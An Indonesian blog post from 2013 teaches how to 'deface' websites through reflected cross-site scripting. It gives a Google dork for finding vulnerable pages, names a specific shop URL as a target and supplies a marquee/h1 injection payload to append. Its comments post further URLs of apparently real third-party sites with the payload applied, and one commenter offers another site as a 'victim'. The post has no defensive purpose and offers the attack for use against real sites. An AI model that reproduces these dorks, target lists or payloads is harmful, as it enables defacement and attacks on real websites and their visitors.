Monday, October 14, 2013

Deface Website dengan Teknik XSS Vulnerability

XSS atau kepanjangan dari Cross Site Scripting merupakan teknik Hacking Injeksi Code ( Code Injection Attack ), yaitu seorang attacker menginjeksi atau memasukan kode ke HTML atau JavaScript, DLL selanjutnya akan di eksekusi oleh client.
Dork: inurl:"/showcatrows.php?CategoryID="
Gunakan dork diatas untuk mencari target di google.

Misal disini kita menemukan target yaitu
http://www.vcm-shop.com/showcatrows.php?CategoryID=12
Maka tambahkan exploit atau scriptnya
"><marquee><h1>Hacked by d0rkc0d3</h1></marquee> dibelakang URL.
Content by: Muhammad Fuad Fachrudin

3 comments:

  1. manteb gan,,,,sumpah manteb,,,,,ane sampek ngekek :D



    http://www.examsolutions.net/maths-revision-papers/showcatrows.php?CategoryID=13%22%3E%3Cmarquee%3E%3Ch1%3EPepy%20Jancuk%3C/h1%3E%3C/marquee%3E



    http://sub-23level-23-cc.info/showcatrows.php?CategoryID=5%22%3E%3Cmarquee%3E%3Ch1%3EPepy%20Jancuk%3C/h1%3E%3C/marquee%3E

    ReplyDelete
  2. Saya nemu korban lagi nih:
    https://www.jembo.co.id/search.php?cat=product&q=

    Silakan di eksekusi ya... :P

    ReplyDelete